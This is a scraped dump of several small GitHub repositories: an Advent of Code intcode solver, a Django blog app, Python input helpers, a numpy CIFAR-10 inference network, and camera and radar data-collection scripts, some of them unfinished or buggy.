"text": "from typing import List\n\nprogram: List[int]\n\nwith open('2019/2/input.txt', mode='r') as file:\n input = file.read()\n program = [int(s) for s in input.split(',')]\n\n## restore the gravity assist program to the \"1202 program alarm\" state\nprogram[1] = 12\nprogram[2] = 2\n\n## alternative test program\n# program = [int(s) for s in [1,9,10,3,2,3,11,0,99,30,40,50]]\n\n## run the program on the intcode computer\ni = 0\nwhile True:\n result = -1\n opcode = program[i]\n if(opcode == 99):\n break\n elif(opcode == 1):\n result = program[program[i + 1]] + program[program[i + 2]]\n elif(opcode == 2):\n result = program[program[i + 1]] * program[program[i + 2]]\n\n program[program[i + 3]] = result\n i += 4\n\nprint(program[0])"
}
] | 2 |
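Both solutions above inline the same add/multiply opcode loop. Extracted into a function, it can be verified against the sample program commented out in 1.py, where position 0 must end as 3500 (first 30 + 40 = 70 is stored at position 3, then 70 * 50 = 3500 at position 0):

```python
# The position-mode intcode interpreter shared by 1.py and 2.py.
def run_intcode(memory):
    program = list(memory)
    i = 0
    while program[i] != 99:
        opcode, a, b, dst = program[i:i + 4]
        if opcode == 1:
            program[dst] = program[a] + program[b]
        elif opcode == 2:
            program[dst] = program[a] * program[b]
        i += 4
    return program[0]

assert run_intcode([1, 9, 10, 3, 2, 3, 11, 0, 99, 30, 40, 50]) == 3500
```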
Anna-G11/Blog_Website_Django | https://github.com/Anna-G11/Blog_Website_Django | efea379495f9c6c07ad255d7f89d9e41f6fe1de3 | 58e90f67820ce931d4b0b7f6648724bb62c734ce | 7c21a643f84cced460a5a99c6f839d51a2abdafc | refs/heads/master | 2022-11-23T05:37:46.148414 | 2020-08-04T13:09:02 | 2020-08-04T13:09:02 | 284,979,451 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6844050288200378,
"alphanum_fraction": 0.6899482607841492,
"avg_line_length": 29.066667556762695,
"blob_id": "a29a03c88ccc04993ecc05001a0cc791f267b8c0",
"content_id": "757f5379b07432656a45732efdae7a3820d06c9b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2706,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 90,
"path": "/Blog_website/BlogProject/Blogapp/views.py",
"repo_name": "Anna-G11/Blog_Website_Django",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render,get_object_or_404,redirect\nfrom django.utils import timezone\nfrom django.urls import reverse_lazy\nfrom Blogapp.models import Post,Comment\nfrom Blogapp.form import PostForm,CommentForm\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.views.generic import (TemplateView,ListView,DetailView,\n CreateView,UpdateView,DeleteView)\n\n# Create your views here.\nclass AboutView(TemplateView):\n template_name = 'about.html'\n\nclass PostListView(ListView):\n model = Post\n\n def get_queryset(self):\n return Post.objects.filter(published_date__lte=timezone.now()).order_by('-published_date')\n template_name='post_list.html'\n\nclass PostDetailView(DetailView):\n model = Post\n template_name = 'post_detail.html'\n\n\nclass CreatePostView(LoginRequiredMixin,CreateView):\n login_url='/login/'\n redirect_field_name = 'Blogapp:post_details'\n form_class = PostForm\n model = Post\n template_name = \"post_form.html\"\n\nclass PostUpdateView(LoginRequiredMixin,UpdateView):\n login_url='/login/'\n redirect_field_name = 'Blogapp:post_details'\n form_class = PostForm\n model = Post\n\nclass PostDeleteView(LoginRequiredMixin,DeleteView):\n model = Post\n success_url = reverse_lazy('Blogapp:post_list')\n\nclass DraftListView(LoginRequiredMixin,ListView):\n login_url='/login/'\n redirect_field_name = 'Blogapp:post_details'\n model = Post\n\n def get_queryset(self):\n return Post.objects.filter(published_date__isnull=True).order_by('create_date')\n template_name = \"post_draft_list.html\"\n\n\n#######################################Comment#####\n\n@login_required\ndef post_publish(request,pk):\n post = get_object_or_404(Post,pk=pk)\n post.publish\n return redirect('Blogapp:post_details',pk=pk)\n\n\n@login_required\ndef add_comment_to_post(request,pk):\n post = get_object_or_404(Post,pk=pk)\n if request.method =='POST':\n form = CommentForm()\n if form.is_valid():\n comment = form.save(commit=False)\n comment.post = post\n comment.save()\n return render('post_detail.html',pk=post.pk)\n else:\n form = CommentForm()\n return render(request,'comment_form.html',{'form':form})\n\n\n\n@login_required\ndef comment_approved(request,pk):\n comment = get_object_or_404(Comment,pk=pk)\n comment.approve()\n return redirect('Blogapp:post_details',pk=comment.post.pk)\n\n@login_required\ndef comment_remove(request,pk):\n comment = get_object_or_404(Comment,pk=pk)\n post_pk= comment.post.pk\n comment.delete()\n return render('post_detail.html',pk= post_pk)\n"
}
] | 1 |
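For reference, the standard bound-form pattern the comment view above is reaching for; a sketch assuming the `Post`, `CommentForm`, and `Blogapp:post_details` names from the file, not a drop-in replacement:

    from django.shortcuts import get_object_or_404, redirect, render

    def add_comment_to_post(request, pk):
        post = get_object_or_404(Post, pk=pk)
        if request.method == 'POST':
            # Bind the submitted data; an unbound CommentForm() is never valid.
            form = CommentForm(request.POST)
            if form.is_valid():
                comment = form.save(commit=False)
                comment.post = post
                comment.save()
                return redirect('Blogapp:post_details', pk=post.pk)
        else:
            form = CommentForm()
        return render(request, 'comment_form.html', {'form': form})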
davvelsan/src-helpers
|
https://github.com/davvelsan/src-helpers
|
56df2fad64eb244c8e6564220f3e5415901e2fdd
|
85ab0f4e22964462dd95558e5a85fb94b625488b
|
f940bcedba2b7073fb21916a86c51baad3755ea9
|
refs/heads/master
| 2017-12-05T04:57:52.554681 | 2017-01-27T11:51:57 | 2017-01-27T11:51:57 | 55,233,302 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5892912149429321,
"alphanum_fraction": 0.5930052399635315,
"avg_line_length": 25.260162353515625,
"blob_id": "7d60d042172f8b95e804b9b4317c4d4ef4c2a436",
"content_id": "f3a648d878097fc5df36323aca5870b3d8b49979",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3231,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 123,
"path": "/_input.py",
"repo_name": "davvelsan/src-helpers",
"src_encoding": "UTF-8",
"text": "\"\"\"\nExposes methods to import various inputs into different structures.\n\n\"\"\"\n\nimport os, sys\nfrom collections import defaultdict\n\n\n# ========== IMPORT\n\ndef inputDict(data, sep, key = 0, n = (0,1), cast = list, mode = 'rdict'):\n \"\"\"\n Converts a variable input type to a python <dict>.\n\n :<string> data: path to file or standard input (denoted by '-')\n :<string> sep: field separator\n :<integer> key: element index to use for dictionary keys\n :<integer> n: value tuple size (start_index, count)\n :<type> cast: type object for values (e.g. list, set, tuple)\n :<string> mode: use nth element from each row (rdict) or column (cdict) as key\n\n :<dict> return: iterable dictionary with <cast> type values\n\n NOTES:\n - missing keys will return the default cast element <type>\n - if cast == <dict>, elements from the first row are used as keys for each subsequent line\n \"\"\"\n\n # data to list of lines\n lines = inputList(data, sep, n = n)\n\n # convert to list of columns\n if mode == 'cdict':\n lines = map(list, zip(*lines))\n\n # convert to a dictionary values are list of type(cast) elements\n d = defaultdict(list)\n if cast == dict:\n cast = lines.pop(0)\n for l in lines:\n d[l[key]].append(dict(zip(cast, l)))\n else:\n for l in lines:\n d[l[key]].append(cast(l))\n\n return d\n\ndef inputList(data, sep, n = (0,1), cast = list):\n \"\"\"\n Converts a tabular input type to an n-dimensional python LIST\n\n :<string> data: file path or standard input (denoted as '-')\n :<string> sep: field separator\n :<integer> n: tuple size (start_index, count)\n :<type> cast: type to cast list elements (e.g. set)\n :<iterable> return: iterable container of <cast> type\n\n NOTES:\n - if cast == <dict>, elements from the first row are used as keys for each subsequent line\n \"\"\"\n\n # load stream\n file = loadStream(data)\n\n # parse data into n-dim list\n if cast == dict:\n keys = file.readline().split(sep)[n[0]:n[1]]\n data = [ dict(zip(keys, line.rstrip('\\r\\n').split(sep)[n[0]:n[1]])) for line in file ]\n else:\n data = [ cast(line.rstrip('\\r\\n').split(sep)[n[0]:n[1]]) for line in file ]\n\n # close stream\n file.close()\n\n return data\n\ndef inputString(data):\n \"\"\"\n Converts a variable input type to <string> format\n\n :<string> data: path to file or standard input (denoted by '-')\n :<string> return: <string> object\n\n \"\"\"\n\n # load stream\n file = loadStream(data)\n\n # read\n s = file.read().rstrip('\\r\\n')\n\n # close stream\n file.close()\n\n # return string\n return s\n\n# ========== AUXLIARY\n\ndef loadStream(_input):\n \"\"\"\n Load a <file> or <stdin> object\n\n :<string> _input: file path or standard input (denoted as '-')\n :<file> return: open(file, 'r') or sys.stdin stream (WARNING: remember to close it!)\n\n \"\"\"\n\n # open standard input\n if _input == '-':\n file = sys.stdin\n\n # open file stream\n elif os.path.isfile(_input):\n file = open(_input, 'r')\n\n # return invalid input\n else:\n print(\"Invalid input data\", file = sys.sterr)\n exit()\n\n return file\n\n"
},
{
"alpha_fraction": 0.6881287693977356,
"alphanum_fraction": 0.6881287693977356,
"avg_line_length": 26.55555534362793,
"blob_id": "99c182e95ad2999aaf83981f5729acaf22064eed",
"content_id": "9bb2d555228572f5c9ccd3c082633b62aef64fbc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 497,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 18,
"path": "/_iterable.py",
"repo_name": "davvelsan/src-helpers",
"src_encoding": "UTF-8",
"text": "\"\"\"\nExposes methods to handle various iterable structures.\n\n\"\"\"\n\nimport itertools # chain()\n\ndef flatten_iterable(iterable, cast = list):\n \"\"\"\n Flattens a two-dimensional iterable object\n\n :<iterable> iterable: python <iterable> or a class that inherits from it\n :<type> cast: type container to cast the flattened element\n :<iterable> return: a flattened one-dimensional <iterable> object of the same input <type>\n\n \"\"\"\n\n return cast(itertools.chain(*iterable))\n\n"
},
{
"alpha_fraction": 0.6477494835853577,
"alphanum_fraction": 0.6477494835853577,
"avg_line_length": 19.399999618530273,
"blob_id": "e2ba4047d874752d403f52f464404f39f367e1a8",
"content_id": "4c6963ca3a7cd49938bb4d8b1268252f06d3ea0c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 511,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 25,
"path": "/_string.py",
"repo_name": "davvelsan/src-helpers",
"src_encoding": "UTF-8",
"text": "\"\"\"\nExposes methods to handle strings.\n\n\"\"\"\n\ndef printError(*objs):\n \"\"\"\n Prints <obj> types to the <stderr> stream\n\n :<*objs>: objects to print\n\n \"\"\"\n\n print(*objs, file=sys.stderr)\n\ndef replaceLiterals(string):\n \"\"\"\n Replaces common literal separator characters with their unicode equivalents\n\n :<string> string: string with literal unicode characters\n :<string> return: string with replaced unicode characters\n\n \"\"\"\n\n return string.replace(\"\\\\t\", \"\\t\").replace(\"\\\\n\", \"\\n\")\n\n"
}
] | 3 |
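A hypothetical session showing how the helpers above compose, assuming a tab-separated file scores.tsv with rows like a<TAB>1<TAB>x (the file name and contents are illustrative only):

    rows = inputList('scores.tsv', '\t', n=(0, 3))         # [['a', '1', 'x'], ...]
    byid = inputDict('scores.tsv', '\t', key=0, n=(0, 3))  # {'a': [['a', '1', 'x']], ...}
    flat = flatten_iterable([[1, 2], [3, 4]])              # [1, 2, 3, 4]
    raw  = inputString('scores.tsv')                       # whole file as one string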
CaptainKey/CIFAR-10-Example
|
https://github.com/CaptainKey/CIFAR-10-Example
|
f1086f67bf3b9b4da6ecff6270cad141eef2a249
|
b497f99dafc47340d30955d8783addcce9f6dfea
|
f2be3f297c8ac00f3b0a981fd59b77f82e9d6c36
|
refs/heads/master
| 2021-01-02T20:31:30.506885 | 2020-02-12T09:23:11 | 2020-02-12T09:23:11 | 239,788,088 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6507772207260132,
"alphanum_fraction": 0.6791018843650818,
"avg_line_length": 35.1875,
"blob_id": "57268f73785897c14f3867b9e4fa0360a3f74883",
"content_id": "636a228db9ca2266d3a7ad690a19d62da416b5a0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2917,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 80,
"path": "/main.py",
"repo_name": "CaptainKey/CIFAR-10-Example",
"src_encoding": "UTF-8",
"text": "import dataset as dt #Importation du module dataset\nimport layers # Importation du module layers\nimport logging as log # Imporation du module logging pour la normalisation\nimport numpy as np # Importation du module numpy\n\n\n\n# Définition de la classe Network qui représente le réseau de neurones\nclass Network:\n \n def __init__(self):\n # Définition des différentes couches nécessaires à l'execution\n self.conv1 = layers.convolution('conv1',[3,32,32],[6,3,5,5],1,bias=True)\n self.pool = layers.maxpooling('maxpooling',2)\n self.conv2 = layers.convolution('conv2',[6,14,14],[16,6,5,5],1,bias=True)\n self.fc1 = layers.linear('fc1',16*5*5,120,bias=True)\n self.fc2 = layers.linear('fc2',120,84,bias=True)\n self.fc3 = layers.linear('fc2',84,10,bias=True)\n self.relu = layers.relu('relu')\n\n def __call__(self,x):\n # Définition de la propagation de l'image dans le réseau\n x = self.pool(self.relu(self.conv1(x)))\n x = self.pool(self.relu(self.conv2(x)))\n x = x.reshape(-1)\n x = self.relu(self.fc1(x))\n x = self.relu(self.fc2(x))\n x = self.fc3(x)\n return x\n\n\n# Définition du répertoire\npath = \"/home/tanguy/Documents/Cours/M1-Python/1102/base/test_batch.bin\"\n\n# Création de l'instance de la classe dataset\ndata = dt.dataset('CIFAR-10',path)\n# Utilisation de la méthode read_dataset pour lire le fichier binaire\nimgs,labels = data.read_dataset()\n\n# Récupération des différentes classes de la base\nclasses = data.get_classes()\n\n# Instance de réseau\nnet = Network()\n\nnet.conv1.load_weight(np.load('params/conv1.weight.npy'))\nnet.conv2.load_weight(np.load('params/conv2.weight.npy'))\n\nnet.conv1.load_bias(np.load('params/conv1.bias.npy'))\nnet.conv2.load_bias(np.load('params/conv2.bias.npy'))\n\n\nnet.fc1.load_weight(np.load('params/fc1.weight.npy').T)\nnet.fc2.load_weight(np.load('params/fc2.weight.npy').T)\nnet.fc3.load_weight(np.load('params/fc3.weight.npy').T)\n\nnet.fc1.load_bias(np.load('params/fc1.bias.npy'))\nnet.fc2.load_bias(np.load('params/fc2.bias.npy'))\nnet.fc3.load_bias(np.load('params/fc3.bias.npy'))\n\n# Boucle sur les images et labels de la base\nfor label,img in zip(labels,imgs):\n # Affichage de l'image courane\n data.display_dataset(img,label)\n # Propagation de l'image dans le réseau\n output = net(img)\n\n # Visualisation des scores de sortie\n print('Netoutput => ',output)\n\n # Récupération de l'indice du maximum dans le vecteur de score\n prediction = output.argmax()\n\n print('Network prediction : {} => {}'.format(prediction, classes[prediction]))\n print('Truth : {} => {}'.format(label,classes[label]))\n\n # Insertion dans les logs de la prédiction du réseau et du label\n log.info('Network prediction : {} => {}'.format(prediction, classes[prediction]))\n log.info('Truth : {} => {}'.format(label,classes[label]))\n exit(0)\n"
},
{
"alpha_fraction": 0.5613174438476562,
"alphanum_fraction": 0.5795375108718872,
"avg_line_length": 31.43181800842285,
"blob_id": "237e766af3c19aa0a5fefe86fafc4c631cbe2c6d",
"content_id": "78692ddd505c18cd9612b7299bec0841154991bf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2861,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 88,
"path": "/dataset/__init__.py",
"repo_name": "CaptainKey/CIFAR-10-Example",
"src_encoding": "UTF-8",
"text": "import numpy as np \nimport matplotlib.pyplot as plt\nimport logging as log \nimport argparse\n\n# Classe de la base de donnée\nclass dataset:\n \n # Initialisation\n def __init__(self,name,path):\n self.name = name\n self.path = path\n self.classes = ['airplane','automobile','bird','cat','deer','dog','frog','horse','ship','truck']\n log.info('init - {}'.format(self.name))\n self.display_classes()\n\n # Méthode pour lire le fichier binaire\n def read_dataset(self):\n log.info('iread_dataset - {}'.format(self.name))\n\n labels = []\n imgs = []\n with open(self.path,\"rb\") as file:\n for j in range(10000):\n byte = file.read(1)\n labels.append(int.from_bytes(byte,byteorder='big'))\n byte_array = file.read(3072)\n img = [byte for byte in byte_array]\n imgs.append(np.array(img,'uint8').reshape(3,32,32))\n return imgs,labels\n\n # Méthode qui permet l'affichage d'une image de la base\n def display_dataset(self,img,label):\n log.info('display_dataset - {}'.format(self.name))\n\n shape = img.shape\n rgb = np.array([ [ [img[0][i][j],img[1][i][j],img[2][i][j]] for j in range(shape[2])] for i in range(shape[1])]) \n\n plt.suptitle(' CIFAR -10 : {}'.format(self.classes[label]), y=0.8)\n ax = plt.subplot(1,4,1)\n ax.set_title('RGB')\n ax.axis('off')\n plt.imshow(rgb)\n\n ax = plt.subplot(1,4,2)\n ax.set_title('R')\n ax.axis('off')\n plt.imshow(img[0],cmap='Reds')\n\n ax = plt.subplot(1,4,3)\n ax.set_title('G')\n ax.axis('off')\n plt.imshow(img[1],cmap='Greens')\n\n ax = plt.subplot(1,4,4)\n ax.set_title('B')\n ax.axis('off')\n plt.imshow(img[2],cmap='Blues')\n\n plt.show()\n\n def get_classes(self):\n return self.classes\n\n # Affiche les différentes classes\n def display_classes(self):\n log.info(\"Classes\")\n for key,value in enumerate(self.classes):\n log.info('{} => {}'.format(key,value))\n\n\n\"\"\"\n Le code ci-dessous est executé si et seulement si c'est le module qui est executé\n ex : python3 __init__.py --path /home/tanguy/Documents/Cours/M1-Python/1102/base/data_batch_1.bin\n\"\"\"\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Read and display CIFAR-10')\n # Définition de/des arguments\n parser.add_argument('--path', metavar='float', type=str, nargs='?',required=True,help='Path to .bin files')\n # Parse des arguments\n args = parser.parse_args()\n\n # Execution d'un code pour lire la base et afficher une image\n data = dataset('CIFAR-10',args.path)\n imgs,labels = data.read_dataset()\n for label,img in zip(labels,imgs):\n data.display_dataset(img,label)\n exit(0)\n"
},
{
"alpha_fraction": 0.6315789222717285,
"alphanum_fraction": 0.7368420958518982,
"avg_line_length": 18,
"blob_id": "a0dec0b378bff7355be686c0b58905bb6d0923f4",
"content_id": "041a6293806e149d372612b34da19c8d404c360a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 19,
"license_type": "no_license",
"max_line_length": 18,
"num_lines": 1,
"path": "/README.md",
"repo_name": "CaptainKey/CIFAR-10-Example",
"src_encoding": "UTF-8",
"text": "# CIFAR-10-Example\n"
},
{
"alpha_fraction": 0.5403634905815125,
"alphanum_fraction": 0.5462806224822998,
"avg_line_length": 33.54744338989258,
"blob_id": "8a8ed7079bd12b411878867bb0d9a8edc8083e6b",
"content_id": "812fc41a9402e157d314f4a9a09547f21904798f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4732,
"license_type": "no_license",
"max_line_length": 165,
"num_lines": 137,
"path": "/layers/__init__.py",
"repo_name": "CaptainKey/CIFAR-10-Example",
"src_encoding": "UTF-8",
"text": "import random \nimport numpy as np\nimport logging as log\n\nlog.basicConfig(filename='debug.log',format='%(levelname)s : %(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p',level=log.INFO,filemode='w')\n\n\"\"\"\n convolution\n\"\"\"\nclass convolution:\n \n def __init__(self,name,img_size,kernel,stride,bias=False):\n self.name = name\n self.img_size = img_size\n self.kernel = kernel \n self.stride = stride \n self.output_size = int(((img_size[2] - (kernel[3] - 1) - 1) / stride))+ 1\n self.weight = np.array( [ [ [ [random.random() for i in range(kernel[3])] for i in range(kernel[2]) ] for j in range(kernel[1])] for k in range(kernel[0])] )\n\n if bias:\n self.bias = np.array([random.random() for i in range(kernel[0])])\n else:\n self.bias = bias\n\n log.info('init - {}'.format(self.name))\n \n def __call__(self,img):\n log.debug('call - {}'.format(self.name))\n img = np.array(img)\n output = np.zeros((self.kernel[0],self.output_size,self.output_size))\n for f in range(self.kernel[0]):\n for c in range(self.img_size[0]):\n for i in range(0,self.output_size):\n for j in range(0,self.output_size):\n for m in range(self.kernel[3]):\n for n in range(self.kernel[3]):\n output[f][i][j] += img[c][i+m][j+n]*self.weight[f][c][m][n]\n if self.bias.all(): output[f][i][j] += self.bias[f]\n return output\n\n def load_weight(self,weight):\n log.debug('load_weight - {}'.format(self.name))\n assert self.weight.shape == weight.shape, log.error('load_weight {}'.format(self.name))\n self.weight = weight\n\n def load_bias(self,bias):\n log.debug('load_bias - {}'.format(self.name))\n assert self.bias.shape == bias.shape, log.error('load_bias {}'.format(self.name))\n self.bias = bias\n\n def get_name(self):\n log.debug('get_name - {}'.format(self.name))\n return self.name\n\n\"\"\"\n linear\n\"\"\"\nclass linear:\n def __init__(self,name,dim_in,dim_out,bias=False):\n self.name = name\n self.dim_in = dim_in\n self.dim_out = dim_out \n self.weight = np.random.rand(dim_in,dim_out)\n self.bias = np.random.random(dim_out) if bias else False \n\n log.info('init - {}'.format(self.name))\n\n def __call__(self,vecteur):\n log.debug('call - {}'.format(self.name))\n output = np.zeros(self.dim_out)\n for i in range(self.dim_in):\n for j in range(self.dim_out):\n output[j] += vecteur[i]*self.weight[i][j]\n if self.bias.all(): output[j] += self.bias[j]\n\n return output\n\n def load_weight(self,weight):\n log.debug('load_weight - {}'.format(self.name))\n assert self.weight.shape == weight.shape, log.error('load_weight {}'.format(self.name))\n self.weight = weight\n\n def load_bias(self,bias):\n log.debug('load_bias - {}'.format(self.name))\n assert self.bias.shape == bias.shape, log.error('load_bias {}'.format(self.name))\n self.bias = bias\n\n def get_name(self):\n log.debug('get_name - {}'.format(self.name))\n return self.name\n\"\"\"\n Maxpooling\n\"\"\"\nclass maxpooling:\n def __init__(self,name,kernel_size):\n self.name = name\n self.kernel_size = kernel_size\n log.info('init - {}'.format(self.name))\n\n def __call__(self,img):\n log.debug('call - {}'.format(self.name))\n shape = img.shape\n output_size = int(shape[1]/self.kernel_size)\n output = np.array([])\n for channels in range(shape[0]):\n for height in range(0,shape[1],self.kernel_size):\n for width in range(0,shape[2],self.kernel_size):\n maximum = img[channels][height][width]\n for m in range(0,self.kernel_size):\n for n in range(0,self.kernel_size):\n if img[channels][height+m][width+n] > maximum : maximum = img[channels][height+m][width+n]\n\n 
output = np.append(output,maximum)\n\n output = output.reshape((shape[0],output_size,output_size))\n return output\n\n def get_name(self):\n log.debug('get_name - {}'.format(self.name))\n return self.name\n\"\"\"\n relu\n\"\"\"\nclass relu:\n def __init__(self,name):\n self.name = name\n log.info('init - {}'.format(self.name))\n\n def __call__(self,x):\n log.debug('call - {}'.format(self.name))\n x[x < 0] = 0\n\n return x\n\n def get_name(self):\n log.debug('get_name - {}'.format(self.name))\n return self.name"
}
] | 4 |
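The layer sizes hard-coded in Network above follow from the output-size formula in layers.convolution.__init__; a quick check of that arithmetic (stride 1, no padding, 5x5 kernels, 2x2 pooling):

    def conv_out(size, kernel, stride=1):
        # Same formula as layers.convolution: ((size - (kernel - 1) - 1) / stride) + 1
        return (size - (kernel - 1) - 1) // stride + 1

    assert conv_out(32, 5) == 28 and 28 // 2 == 14  # conv1 + pool: 6 x 14 x 14
    assert conv_out(14, 5) == 10 and 10 // 2 == 5   # conv2 + pool: 16 x 5 x 5 = fc1 input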
clo64/data_scripts
|
https://github.com/clo64/data_scripts
|
d3aa759c1fc882ef411bf0a1e5f65dcd6678a11d
|
76aeac06da33a36e95c8996244477a5ea9f02515
|
01fe32f12cd92ae242b489df3ba8a21ee2f091e5
|
refs/heads/master
| 2022-10-14T03:20:15.153082 | 2020-06-09T12:07:34 | 2020-06-09T12:07:34 | 267,169,817 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6867470145225525,
"alphanum_fraction": 0.7028112411499023,
"avg_line_length": 26.77777862548828,
"blob_id": "b90ef19ab02a8b04f635d60ec50b90a5f3278010",
"content_id": "f10812d8af9a53d58c7b909f656827afc198b77c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 249,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 9,
"path": "/data_collector/json_Stream_test.py",
"repo_name": "clo64/data_scripts",
"src_encoding": "UTF-8",
"text": "import jsonstreams\n\nwith jsonstreams.Stream(jsonstreams.Type.object, filename='foo') as s:\n s.write('foo', 'bar')\n\ns2 = jsonstreams.Stream(jsonstreams.Type.object, filename='Hi')\ns2.write('too', ['threw'])\ns2.write('welcome', ['hell'])\ns2.close()"
},
{
"alpha_fraction": 0.6061643958091736,
"alphanum_fraction": 0.6541095972061157,
"avg_line_length": 15.277777671813965,
"blob_id": "220cac2b86e678a3e613134152c63c07e6a6e56d",
"content_id": "a89bba9b163ebee1ebc6600b6de708efc0401e05",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 292,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 18,
"path": "/camera_script/camera_script.py",
"repo_name": "clo64/data_scripts",
"src_encoding": "UTF-8",
"text": "import cv2 as cv\nimport keyboard\n\ncap = cv.VideoCapture(0)\n\nfourcc = cv.VideoWriter_fourcc(*'mp4v')\n\nvideo_out = cv.VideoWriter('vidTest.mp4', fourcc, 20.0, (640, 480))\n\nwhile True:\n\n ret, frame = cap.read()\n\n cv.imshow('frame', frame)\n\n k = cv.waitKey(1)\n\n video_out.write(frame)"
},
{
"alpha_fraction": 0.5212915539741516,
"alphanum_fraction": 0.5446888208389282,
"avg_line_length": 32.359375,
"blob_id": "1bd28291f3e82869bff8c019c29f1d6836304349",
"content_id": "54eec17de623b4b77e62b5deaa9cd114ae9cad2d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2137,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 64,
"path": "/data_processor/data_processor_functions.py",
"repo_name": "clo64/data_scripts",
"src_encoding": "UTF-8",
"text": "\"\"\"\nSet of functions to aid in processing video and RF files\n\"\"\"\nimport os.path\nimport cv2 as cv\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\nimport json\n\nPATHRAWDATA = '../data/raw/'\nPATHPROCCDATA = '../data/processed/'\nVIDNAME = 'rbg_'\nVIDEXT = '.mp4'\nFRAMENAME = 'framedata_'\nFRAMEEXT = '.json'\n\ndef verifyDataFiles(start, end):\n\n print('Verifying all files exist...')\n\n for i in range(int(start), int(end)+1):\n vidName = PATHRAWDATA + VIDNAME + str(i) + VIDEXT\n frameDataName = PATHRAWDATA + FRAMENAME + str(i) + FRAMEEXT\n\n #Check for all video files\n if(os.path.exists(vidName)):\n flag = 'found'\n print('{0:35}... {1:6}'.format(vidName, flag))\n else:\n flag = 'failed'\n print('{0:35}... {1:6}'.format(vidName, flag))\n print(vidName + ' not found, check files')\n exit()\n\n #Check for all frame data files\n if(os.path.exists(frameDataName)):\n flag = 'found'\n print('{0:35}... {1:6}'.format(frameDataName, flag))\n else:\n flag = 'failed'\n print('{0:35}... {1:6}'.format(frameDataName, flag))\n print(frameDataName + ' not found, check files')\n exit()\n\n #**Check for RF data files in future**\n \ndef plotProbMap(probmap, frame):\n plt.imshow(cv.cvtColor(frame, cv.COLOR_BGR2RGB))\n plt.imshow(probmap, alpha=0.6)\n plt.pause(.03)\n plt.show()\n\ndef MPIBodyParts():\n return { \"Head\": 0, \"Neck\": 1, \"RShoulder\": 2, \"RElbow\": 3, \"RWrist\": 4,\n \"LShoulder\": 5, \"LElbow\": 6, \"LWrist\": 7, \"RHip\": 8, \"RKnee\": 9,\n \"RAnkle\": 10, \"LHip\": 11, \"LKnee\": 12, \"LAnkle\": 13, \"Chest\": 14,\n \"Background\": 15 }\n\ndef MPIPosePairs():\n return [ [\"Head\", \"Neck\"], [\"Neck\", \"RShoulder\"], [\"RShoulder\", \"RElbow\"],\n [\"RElbow\", \"RWrist\"], [\"Neck\", \"LShoulder\"], [\"LShoulder\", \"LElbow\"],\n [\"LElbow\", \"LWrist\"], [\"Neck\", \"Chest\"], [\"Chest\", \"RHip\"], [\"RHip\", \"RKnee\"],\n [\"RKnee\", \"RAnkle\"], [\"Chest\", \"LHip\"], [\"LHip\", \"LKnee\"], [\"LKnee\", \"LAnkle\"] ]\n\n\n"
},
{
"alpha_fraction": 0.6702290177345276,
"alphanum_fraction": 0.7038167715072632,
"avg_line_length": 19.80645179748535,
"blob_id": "7b4336210b8d037bd2372188f3e80bbe3f12c2cd",
"content_id": "1ac7752957bcc835905e9dc0302bd3629441fa70",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 655,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 31,
"path": "/data_processor/read_walabot_json.py",
"repo_name": "clo64/data_scripts",
"src_encoding": "UTF-8",
"text": "\"\"\"\nQuick practice script to learn how to use ijson\n\nGoal is to read very large JSON files without loading into\nmemory\n\nnote: ijson likes files opened in binary format\n\"\"\"\n\nimport ijson\nfrom mpl_toolkits import mplot3d\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport rasterio\n\nmin_R, max_R, res_R = 30, 200, 4\nmin_Theta, max_Theta, res_Theta = -40, 40, 4\nmin_Phi, max_Phi, res_Phi = -40, 40, 4\n\n# rb flag opens file in binary\njson_to_parse = open('../data/raw/wala_1.json', 'rb')\n\ntest_object = ijson.items(json_to_parse, '25')\n\n1\n\nprint(wala_data_array)\nprint(wala_data_array.shape)\n\nfig = plt.figure()\nax = plt.axes(projection='3d')\n\n\n\n \n\n\n"
},
{
"alpha_fraction": 0.6790894269943237,
"alphanum_fraction": 0.6941982507705688,
"avg_line_length": 27.86046600341797,
"blob_id": "e49dc41c81b9b528bc48ca05b4402edafb46ff56",
"content_id": "cce717bdfbf745326e0388f1ef18bd94279e9ad7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4964,
"license_type": "no_license",
"max_line_length": 160,
"num_lines": 172,
"path": "/data_collector/data_collector.py",
